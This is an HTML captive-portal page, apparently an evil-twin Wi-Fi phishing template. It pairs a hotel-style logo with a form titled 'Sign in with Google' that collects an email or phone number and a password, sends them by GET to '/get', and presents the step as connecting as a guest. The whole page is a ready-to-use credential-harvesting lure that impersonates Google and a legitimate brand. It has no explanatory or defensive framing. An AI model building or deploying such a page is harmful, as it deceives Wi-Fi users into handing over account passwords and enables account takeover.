<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #000000;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #000000;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #FFC72C;
}



</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
  <svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="120.000000pt" height="99.000000pt" viewBox="0 0 1200.000000 998.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,998.000000) scale(0.100000,-0.100000)"
fill="#000000" stroke="none">
<path d="M4771 9744 c-140 -37 -271 -153 -360 -319 -30 -55 -69 -124 -88 -153
-18 -28 -34 -62 -36 -75 -2 -20 2 -22 46 -19 27 1 94 -8 150 -19 134 -29 333
-31 427 -6 96 26 174 67 178 95 3 18 -1 22 -21 22 -13 0 -87 21 -163 46 -109
37 -154 47 -210 48 l-72 1 33 36 c18 21 60 77 93 125 71 106 101 136 165 164
113 50 2 93 -142 54z"/>
<path d="M7023 9753 c-26 -10 -14 -41 21 -53 55 -18 125 -87 191 -190 34 -52
69 -101 78 -109 9 -7 17 -17 17 -21 0 -4 -34 -10 -75 -13 -48 -3 -116 -19
-192 -45 -65 -22 -133 -43 -150 -47 -75 -15 -17 -73 110 -110 127 -37 325 -37
492 0 39 9 90 15 115 13 39 -3 45 0 48 18 2 11 -17 54 -41 95 -25 41 -64 110
-88 153 -56 102 -172 222 -250 260 -97 46 -226 70 -276 49z"/>
<path d="M5260 9725 c-126 -35 -239 -108 -282 -183 -21 -35 -15 -44 52 -67
133 -47 381 11 495 116 41 38 82 96 73 104 -2 1 -19 11 -38 21 -48 25 -223 30
-300 9z"/>
<path d="M6426 9724 c-63 -23 -68 -30 -45 -69 44 -73 130 -130 261 -170 77
-24 100 -27 185 -23 98 5 173 27 173 53 0 24 -63 95 -113 128 -58 37 -139 71
-207 87 -65 14 -208 11 -254 -6z"/>
<path d="M7723 9453 c-26 -10 -12 -43 32 -74 61 -44 111 -123 155 -244 20 -55
46 -118 58 -141 l20 -40 -61 15 c-52 13 -77 13 -181 1 -67 -7 -160 -15 -208
-17 -81 -5 -88 -7 -88 -26 0 -53 173 -158 325 -196 104 -27 227 -41 344 -41
64 0 109 -5 138 -16 75 -29 89 -6 52 88 -11 29 -36 106 -55 170 -61 214 -151
355 -281 441 -95 63 -205 99 -250 80z"/>
<path d="M4124 9431 c-174 -63 -315 -230 -389 -461 -15 -47 -40 -124 -56 -172
-36 -108 -37 -138 -6 -138 12 0 40 7 62 15 25 9 81 14 150 15 176 0 357 36
470 93 110 55 188 127 170 157 -4 6 -23 8 -43 4 -20 -3 -86 2 -146 10 -132 19
-268 20 -318 2 l-37 -13 24 41 c13 22 39 82 59 132 55 144 80 187 147 247 43
38 60 60 56 71 -9 22 -78 20 -143 -3z"/>
<path d="M3435 8931 c-45 -21 -136 -112 -184 -184 -76 -112 -113 -249 -115
-416 -1 -111 12 -400 20 -438 7 -34 35 -29 88 15 25 21 69 46 98 56 96 34 279
125 362 180 168 112 341 337 286 371 -6 4 -36 -3 -68 -15 -31 -12 -102 -32
-157 -45 -163 -39 -261 -78 -334 -133 -19 -14 -31 -19 -26 -12 5 8 12 105 16
215 8 219 17 264 69 345 49 76 27 99 -55 61z"/>
<path d="M8454 8935 c-7 -17 1 -36 36 -90 36 -56 50 -141 53 -330 2 -99 8
-189 12 -199 7 -15 0 -13 -31 11 -57 45 -168 89 -326 128 -76 19 -152 42 -169
51 -39 20 -59 12 -59 -23 0 -76 150 -248 300 -345 104 -68 175 -104 302 -153
58 -22 119 -54 148 -77 79 -63 83 -57 94 107 16 235 13 450 -8 525 -26 98 -79
197 -151 281 -68 81 -109 112 -163 124 -25 5 -33 3 -38 -10z"/>
<path d="M5490 8569 c-523 -58 -924 -289 -1097 -634 -93 -184 -126 -326 -126
-545 -1 -235 30 -376 119 -550 177 -345 502 -541 1022 -620 180 -27 342 -39
702 -50 407 -13 527 -28 715 -87 159 -50 302 -148 360 -247 74 -128 73 -351
-2 -499 -75 -148 -329 -295 -628 -362 -384 -87 -935 -4 -1267 191 -186 109
-400 310 -517 484 -96 143 -182 325 -222 470 -7 25 -18 48 -24 52 -5 4 -40 8
-77 8 l-68 0 0 -635 0 -636 77 3 c77 3 77 3 83 33 24 113 124 197 216 182 19
-3 148 -48 287 -100 372 -140 542 -192 767 -234 117 -21 522 -25 670 -5 500
67 828 244 1072 578 56 77 119 200 146 284 104 322 45 774 -137 1051 -100 151
-228 266 -395 355 -238 126 -442 166 -961 184 -632 23 -780 35 -957 81 -115
29 -211 65 -319 120 -166 85 -229 173 -237 332 -6 110 7 147 86 246 134 168
324 277 579 331 222 48 683 34 893 -27 342 -98 667 -351 906 -704 54 -80 158
-279 182 -347 11 -31 13 -32 66 -32 l56 0 0 605 0 605 -74 0 -73 0 -13 -45
c-32 -115 -113 -182 -208 -173 -48 5 -182 57 -378 146 -152 70 -416 142 -649
178 -122 18 -458 26 -575 13z"/>
<path d="M2872 8091 c-46 -48 -105 -161 -126 -245 -37 -143 -28 -301 28 -468
120 -354 123 -363 145 -366 15 -2 29 9 52 42 18 25 76 79 129 121 253 197 440
458 440 615 0 65 -15 71 -72 28 -24 -18 -93 -61 -153 -96 -128 -73 -248 -169
-274 -219 l-18 -36 -6 64 c-3 35 -20 110 -36 166 -47 156 -57 229 -42 299 21
98 20 128 -6 132 -15 2 -34 -10 -61 -37z"/>
<path d="M9005 8120 c-4 -6 1 -34 11 -63 28 -82 21 -169 -26 -337 -22 -80 -40
-158 -40 -175 0 -28 -20 -75 -20 -48 0 18 -94 108 -158 151 -31 22 -99 63
-151 92 -51 29 -108 65 -126 81 -39 34 -61 37 -70 8 -19 -57 33 -198 121 -330
58 -88 189 -221 319 -325 55 -44 112 -99 128 -122 20 -30 35 -42 52 -42 21 0
27 9 48 78 13 42 45 133 70 202 64 177 81 266 74 409 -5 122 -18 172 -73 287
-49 100 -135 172 -159 134z"/>
<path d="M2589 7168 c-52 -58 -74 -150 -74 -318 0 -126 3 -154 24 -215 34
-100 103 -229 178 -330 36 -49 88 -126 115 -172 39 -67 53 -83 73 -83 19 0 27
9 43 53 11 28 58 103 103 164 186 250 278 474 281 683 1 77 -12 120 -37 120
-8 0 -20 -10 -26 -22 -7 -13 -71 -84 -143 -158 -132 -136 -213 -242 -223 -292
-8 -39 -15 -35 -37 17 -10 25 -43 87 -74 138 -109 182 -149 293 -136 378 6 38
-6 69 -28 69 -5 0 -23 -15 -39 -32z"/>
<path d="M9324 7192 c-6 -4 -14 -45 -16 -92 -6 -99 -27 -160 -95 -275 -67
-115 -133 -244 -134 -263 0 -10 -7 3 -14 28 -21 69 -92 162 -223 295 -64 66
-130 136 -145 155 l-27 35 -21 -25 c-20 -23 -21 -33 -16 -120 13 -214 107
-435 288 -670 40 -52 82 -120 94 -150 31 -80 54 -80 102 0 21 33 76 113 121
178 92 128 171 281 198 382 37 138 15 391 -40 473 -26 37 -57 59 -72 49z"/>
<path d="M3242 6223 c-5 -10 -12 -31 -16 -47 -4 -16 -36 -92 -71 -170 -84
-185 -106 -255 -113 -349 l-5 -79 -66 65 c-36 35 -104 93 -151 129 -147 114
-198 174 -230 270 -21 66 -44 82 -70 50 -28 -34 -35 -86 -22 -182 14 -110 52
-228 99 -310 62 -106 197 -234 363 -344 80 -53 174 -117 209 -142 87 -62 95
-59 102 46 3 55 18 129 42 209 83 276 94 517 35 736 -28 105 -82 164 -106 118z"/>
<path d="M8668 6215 c-77 -88 -109 -357 -72 -603 8 -58 35 -175 60 -259 30
-106 44 -171 44 -213 0 -91 19 -91 135 0 33 26 112 80 175 121 258 168 386
324 441 537 23 91 25 227 5 277 -20 46 -49 47 -66 3 -50 -137 -101 -200 -264
-322 -63 -47 -133 -107 -157 -134 l-44 -48 -1 70 c-2 90 -34 191 -120 376 -35
76 -68 156 -72 177 -10 47 -33 54 -64 18z"/>
<path d="M3497 5424 c-3 -3 -3 -27 0 -53 3 -26 -3 -110 -13 -186 -25 -191 -24
-352 3 -426 l21 -57 -72 38 c-39 21 -120 55 -181 75 -170 57 -254 105 -329
187 -80 88 -100 89 -104 6 -6 -106 89 -280 218 -401 123 -117 262 -184 520
-252 69 -18 157 -44 195 -59 126 -46 149 -33 116 68 -15 45 -23 111 -30 251
-12 213 -34 336 -86 481 -63 176 -170 334 -227 334 -13 0 -27 -3 -31 -6z"/>
<path d="M8375 5395 c-74 -74 -164 -260 -206 -424 -29 -112 -49 -287 -49 -419
0 -93 -4 -131 -21 -183 -36 -111 -18 -120 135 -65 52 19 141 46 198 60 351 84
571 250 682 513 32 76 41 130 27 166 -16 42 -44 34 -85 -23 -63 -88 -139 -133
-346 -205 -74 -26 -163 -62 -197 -81 l-62 -34 21 47 c30 66 35 219 14 380 -9
67 -16 162 -16 212 l0 91 -30 0 c-20 0 -40 -11 -65 -35z"/>
<path d="M4061 4697 c-8 -10 -5 -28 10 -68 12 -30 34 -126 50 -214 45 -240 64
-298 134 -396 l33 -46 -67 14 c-36 7 -140 18 -231 23 -229 13 -296 31 -403
104 -53 36 -59 38 -74 24 -27 -28 -1 -104 62 -181 126 -152 314 -259 525 -298
67 -12 661 -16 680 -4 19 12 10 44 -24 88 -46 61 -47 63 -102 227 -85 257
-197 451 -345 602 -111 113 -214 165 -248 125z"/>
<path d="M7793 4684 c-29 -14 -87 -60 -130 -103 -152 -150 -272 -362 -360
-630 -31 -96 -58 -159 -79 -187 -90 -117 -97 -114 282 -115 270 -1 320 2 399
19 179 39 300 106 436 242 90 90 124 149 117 206 -2 24 -7 29 -28 26 -13 -1
-36 -13 -50 -26 -43 -41 -94 -61 -220 -91 -14 -3 -97 -10 -185 -15 -146 -9
-238 -20 -289 -36 -15 -5 -11 4 16 37 69 85 100 175 138 394 11 66 32 158 47
203 22 70 24 85 12 93 -23 15 -53 10 -106 -17z"/>
<path d="M4793 4200 c-33 -13 -28 -36 15 -85 20 -23 60 -81 87 -129 152 -265
225 -359 317 -408 l43 -23 -30 -2 c-70 -7 -158 -28 -287 -68 -221 -70 -293
-76 -440 -34 -61 17 -77 5 -58 -40 30 -74 162 -157 327 -208 79 -24 103 -27
238 -26 178 0 263 19 485 107 76 31 169 63 206 71 143 32 156 53 78 127 -26
23 -78 85 -116 136 -226 300 -502 514 -743 577 -66 17 -90 18 -122 5z"/>
<path d="M7059 4199 c-73 -17 -220 -88 -317 -152 -126 -84 -275 -226 -383
-364 -46 -59 -111 -137 -145 -173 -33 -36 -64 -72 -67 -82 -10 -30 17 -47 106
-68 48 -11 136 -40 195 -64 386 -159 627 -166 911 -27 115 56 197 149 162 184
-8 8 -23 8 -59 -2 -146 -41 -207 -37 -437 34 -158 49 -229 65 -282 65 l-37 0
50 31 c99 63 169 149 283 351 39 70 89 149 111 177 47 59 50 78 14 91 -29 12
-55 11 -105 -1z"/>
<path d="M5929 3983 c-30 -47 -71 -113 -92 -147 -44 -71 -61 -126 -51 -169 20
-93 83 -153 171 -164 89 -10 168 33 204 112 38 82 19 152 -82 302 -29 43 -63
95 -74 116 l-22 37 -54 -87z"/>
<path d="M5915 3356 c-53 -20 -111 -83 -125 -136 -18 -65 1 -118 89 -260 43
-69 84 -135 90 -148 12 -22 14 -20 60 55 26 43 66 107 88 143 51 83 67 131 60
187 -13 119 -148 200 -262 159z"/>
<path d="M735 2085 c-225 -47 -411 -220 -460 -427 -19 -81 -19 -225 0 -306 39
-165 155 -291 326 -356 86 -32 150 -43 331 -56 194 -14 324 -33 413 -61 134
-41 204 -150 176 -277 -16 -75 -27 -99 -73 -148 -87 -95 -218 -137 -428 -138
-155 -1 -223 13 -336 69 -158 80 -271 224 -344 440 -27 79 -28 80 -64 83 l-36
3 0 -325 0 -326 35 0 c30 0 35 4 40 27 11 50 38 93 63 100 33 8 91 -11 194
-63 172 -88 274 -109 490 -101 164 5 261 27 373 82 143 71 246 181 303 322 25
64 27 77 26 223 0 166 -12 218 -68 314 -35 60 -133 149 -202 184 -131 66 -231
87 -498 107 -111 9 -228 20 -260 26 -182 32 -267 118 -253 256 13 122 111 215
267 254 31 8 104 14 165 14 180 -1 321 -56 451 -178 95 -89 157 -186 198 -314
17 -52 18 -53 57 -53 l39 0 0 300 0 300 -39 0 c-38 0 -38 0 -45 -45 -8 -63
-22 -85 -52 -85 -14 0 -87 27 -162 61 -74 33 -170 70 -211 81 -101 26 -318 33
-416 13z"/>
<path d="M1800 2010 l0 -50 80 0 80 0 0 -800 0 -800 -80 0 -80 0 0 -50 0 -50
376 0 375 0 -3 48 -3 47 -77 3 -78 3 0 445 c0 431 1 446 21 489 42 90 166 175
254 175 62 0 131 -28 168 -69 65 -72 67 -91 67 -593 l0 -448 -80 0 -80 0 0
-50 0 -50 370 0 370 0 0 50 0 50 -75 0 -75 0 0 393 c0 215 -5 422 -10 459 -15
101 -45 171 -101 233 -92 100 -224 145 -429 145 -166 0 -262 -30 -354 -111
l-46 -41 0 311 0 311 -295 0 -295 0 0 -50z"/>
<path d="M8086 1929 c-56 -202 -198 -341 -379 -371 l-67 -11 0 -43 0 -44 75 0
75 0 0 -442 c0 -244 5 -474 10 -513 13 -94 62 -190 115 -227 65 -45 150 -61
290 -55 138 5 193 21 254 74 71 60 103 146 116 306 l6 77 -44 0 -44 0 -5 -79
c-6 -99 -41 -179 -91 -206 -68 -36 -153 8 -176 91 -7 25 -11 200 -11 507 l0
467 120 0 120 0 0 45 0 45 -120 0 -120 0 0 220 0 220 -53 0 -54 0 -17 -61z"/>
<path d="M4015 1575 c-209 -47 -370 -166 -454 -336 -62 -126 -76 -191 -75
-349 1 -210 46 -338 163 -462 133 -142 307 -208 547 -208 211 0 379 59 498
174 86 85 137 193 150 324 l5 52 -43 0 -43 0 -6 -59 c-18 -202 -220 -364 -452
-364 -149 1 -257 68 -325 204 -36 70 -70 215 -70 296 l0 53 467 2 467 3 -3 55
c-10 199 -85 378 -205 487 -113 104 -235 143 -435 142 -69 0 -153 -7 -186 -14z
m273 -81 c70 -29 117 -91 148 -193 14 -49 34 -200 34 -263 l0 -38 -281 0 -281
0 7 66 c32 302 204 499 373 428z"/>
<path d="M5665 1569 c-66 -23 -102 -45 -157 -98 l-38 -35 0 57 0 57 -295 0
-295 0 0 -45 0 -45 80 0 80 0 0 -550 0 -550 -80 0 -80 0 0 -50 0 -50 370 0
370 0 0 50 0 50 -76 0 -75 0 3 388 4 387 27 82 c51 152 134 243 251 278 57 17
124 19 146 5 12 -8 11 -10 -8 -10 -43 0 -102 -39 -133 -87 -24 -38 -29 -58
-29 -105 0 -122 75 -198 195 -198 86 0 142 34 180 109 24 48 17 179 -12 236
-28 53 -77 99 -133 124 -63 29 -211 29 -295 0z"/>
<path d="M6570 1576 c-248 -53 -370 -160 -370 -326 1 -158 110 -249 253 -209
47 13 106 63 123 106 20 47 17 120 -6 169 -19 39 -82 94 -107 94 -7 0 -15 5
-18 10 -4 6 18 21 48 35 155 68 329 47 415 -51 87 -98 82 -256 -11 -327 -59
-45 -99 -59 -291 -102 -212 -48 -273 -68 -347 -115 -133 -86 -177 -285 -98
-447 63 -130 195 -193 403 -193 170 0 313 54 397 149 22 24 41 42 43 40 2 -2
11 -18 19 -35 27 -53 67 -94 121 -122 48 -25 59 -27 186 -27 127 0 138 2 192
28 102 50 147 141 156 320 l5 107 -42 0 -41 0 0 -70 c0 -100 -17 -169 -50
-202 -35 -34 -70 -36 -107 -4 l-28 24 -6 394 c-7 415 -12 466 -59 559 -44 85
-133 149 -256 184 -81 23 -430 30 -524 11z m378 -1066 c-17 -65 -89 -134 -159
-154 -94 -27 -168 6 -211 92 -19 40 -23 62 -23 147 0 161 31 201 240 307 66
33 129 67 140 74 20 14 20 12 23 -203 2 -151 -1 -232 -10 -263z"/>
<path d="M9132 1571 c-248 -63 -424 -236 -489 -481 -24 -91 -24 -311 1 -399
48 -174 161 -314 316 -389 119 -58 184 -73 340 -79 110 -4 153 -1 230 15 262
54 428 206 497 454 24 88 24 316 -1 413 -58 224 -203 380 -421 452 -70 23
-100 26 -240 29 -131 3 -173 0 -233 -15z m286 -81 c82 -37 133 -115 173 -266
30 -111 39 -446 15 -581 -40 -229 -126 -337 -271 -337 -154 0 -241 108 -275
341 -17 114 -8 483 14 578 20 89 65 181 109 223 63 61 156 78 235 42z"/>
<path d="M10898 1575 c-65 -18 -124 -49 -180 -96 l-48 -40 0 55 0 56 -295 0
-295 0 0 -45 0 -45 80 0 80 0 0 -550 0 -550 -80 0 -80 0 0 -50 0 -50 375 0
375 0 0 50 0 50 -80 0 -80 0 0 445 0 446 24 48 c48 94 163 171 256 171 60 0
126 -28 164 -70 64 -71 66 -91 66 -592 l0 -448 -80 0 -80 0 0 -50 0 -50 370 0
370 0 0 50 0 50 -75 0 -75 0 0 398 c0 222 -5 425 -10 460 -16 98 -47 167 -100
225 -95 104 -223 148 -429 146 -70 0 -147 -7 -173 -14z"/>
</g>
</svg>



  </div>

  <div class="form-container">

    <center><h1>Sign in with Google</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Connect as guest</button>

    </form>

  </div>

</div>

</body>
</html>
